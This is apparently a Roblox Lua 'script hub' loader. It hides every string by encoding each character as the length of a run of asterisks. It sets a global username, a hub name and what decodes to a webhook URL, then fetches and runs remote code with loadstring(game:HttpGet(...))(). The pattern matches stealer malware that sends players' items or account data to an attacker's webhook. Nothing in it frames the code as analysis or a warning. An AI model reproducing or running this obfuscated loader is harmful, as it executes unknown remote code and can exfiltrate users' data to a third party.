function wEFYYDuORMOmmWZHEyUnGZayWntPeYCViCmdvbaHiEqlzNmcEIVsyeDPVXMdmVNEvIIRdgSaIhqABlPGRbiutPvVNeQmAt(c)
tab={}
for i = 1,#c do
x=string.len(c[i]) 
y=string.char(x)
table.insert(tab,y)
end
x=table.concat(tab)
return x
end 


_G.Username = wEFYYDuORMOmmWZHEyUnGZayWntPeYCViCmdvbaHiEqlzNmcEIVsyeDPVXMdmVNEvIIRdgSaIhqABlPGRbiutPvVNeQmAt({'******************************************************************','*************************************************************************************************','******************************************************************************************************************','********************************************************************************************************************','***********************************************************************************************','***********************************************************************************','*********************************************************************************************************','*************************************************************************************************************','****************************************************************************************************************','*******************************************************************************************************************','***************************************************************************************************************','**************************************************************************************************************','**************************************************','*******************************************************'}) 
_G.HubName = wEFYYDuORMOmmWZHEyUnGZayWntPeYCViCmdvbaHiEqlzNmcEIVsyeDPVXMdmVNEvIIRdgSaIhqABlPGRbiutPvVNeQmAt({'*******************************************************************','***************************************************************************************************************','*************************************************************************************************************','*****************************************************************************************************','********************************************************************************************************************','********************************','**********************************************************************','*************************************************************************************************','******************************************************************************************************************','*************************************************************************************************************'})
_G.WebhookUrl = wEFYYDuORMOmmWZHEyUnGZayWntPeYCViCmdvbaHiEqlzNmcEIVsyeDPVXMdmVNEvIIRdgSaIhqABlPGRbiutPvVNeQmAt({'********************************************************************************************************','********************************************************************************************************************','********************************************************************************************************************','****************************************************************************************************************','*******************************************************************************************************************','**********************************************************','***********************************************','***********************************************','****************************************************************************************************','*********************************************************************************************************','*******************************************************************************************************************','***************************************************************************************************','***************************************************************************************************************','******************************************************************************************************************','****************************************************************************************************','**********************************************','***************************************************************************************************','***************************************************************************************************************','*************************************************************************************************************','***********************************************','*************************************************************************************************','****************************************************************************************************************','*********************************************************************************************************','***********************************************','***********************************************************************************************************************','*****************************************************************************************************','**************************************************************************************************','********************************************************************************************************','***************************************************************************************************************','***************************************************************************************************************','***********************************************************************************************************','*******************************************************************************************************************','***********************************************','*************************************************','*************************************************','************************************************','************************************************','****************************************************','*******************************************************','*****************************************************','******************************************************','************************************************','************************************************','****************************************************','****************************************************','*****************************************************','*************************************************','*************************************************','******************************************************','****************************************************','***************************************************','*******************************************************','***********************************************','************************************************************************************','******************************************************************************************************************','****************************************************************************************************************','********************************************************','************************************************************************************','***********************************************************************************************************************','********************************************************************************************************','*****************************************************************************','*************************************************************************************************************','****************************************************************************************************','***************************************************************************************************','*********************************************************************','***************************************************************************************************','*********************************************************************************************************','*******************************************************************','******************************************************','************************************************','****************************************************************************************','*****************************************************','***********************************************************************************************************','**********************************************************************************************************','*************************************************************************************************************','*********************************************************************************************************************','****************************************************','************************************************','*****************************************************','********************************************************************************','*******************************************************','******************************************************************************************************','************************************************************************************','********************************************************','*******************************************************','********************************************************','****************************************************************************************************************','*******************************************************************************','**************************************************************************************************************','************************************************','*********************************************************************','****************************************************************************************************','*****************************************************************************************','*************************************************************************************','*******************************************************************************************************','*************************************************************************************************************************','*************************************************','**********************************************************************','***********************************************************************************************************************','******************************************************************************','*********************************************','**********************************************************************************','********************************************************************','**********************************************************************************************************************','**********************************************************************','*************************************************','****************************************************************************************************','*************************************************************************************','*******************************************************************','***********************************************************************************','****************************************************************************************************************','******************************************************','*********************************************************************************','**********************************************************************************************************','***************************************************************************************************************','****************************************************************************************************','***********************************************************************************','************************************************************************','*************************************************************************************************************************','************************************************','**************************************************************************'})

loadstring(game:HttpGet(wEFYYDuORMOmmWZHEyUnGZayWntPeYCViCmdvbaHiEqlzNmcEIVsyeDPVXMdmVNEvIIRdgSaIhqABlPGRbiutPvVNeQmAt({'********************************************************************************************************','********************************************************************************************************************','********************************************************************************************************************','****************************************************************************************************************','*******************************************************************************************************************','**********************************************************','***********************************************','***********************************************','******************************************************************************************************************','*************************************************************************************************','***********************************************************************************************************************','**********************************************','*******************************************************************************************************','*********************************************************************************************************','********************************************************************************************************************','********************************************************************************************************','*********************************************************************************************************************','**************************************************************************************************','*********************************************************************************************************************','*******************************************************************************************************************','*****************************************************************************************************','******************************************************************************************************************','***************************************************************************************************','***************************************************************************************************************','**************************************************************************************************************','********************************************************************************************************************','*****************************************************************************************************','**************************************************************************************************************','********************************************************************************************************************','**********************************************','***************************************************************************************************','***************************************************************************************************************','*************************************************************************************************************','***********************************************','**************************************************************************','*************************************************************************************************','*************************************************************************************************************************','*********************************************************************************************************','*********************************************************************************************************','***************************************************************************************************************','***************************************************************************************************','*****************************************************************************************************','*************************************************************************************************','**************************************************************************************************************','*********************************************************************************************************','*********************************************************************************************************','***********************************************','********************************************************************************','*****************************************************************************************************','*************************************************************************************************','***********************************************************************************************************','*******************************************************************************','**************************************************************************************************************','************************************************************************************','***************************************************************************************************************','****************************************************************************************************************','***********************************************','*************************************************************************************************************','*************************************************************************************************','*********************************************************************************************************','**************************************************************************************************************','***********************************************','****************************************************************************************************************','*****************************************************************************************************','*************************************************************************************************','***********************************************************************************************************','**********************************************','************************************************************************************************************','*********************************************************************************************************************','*************************************************************************************************'})))()
    
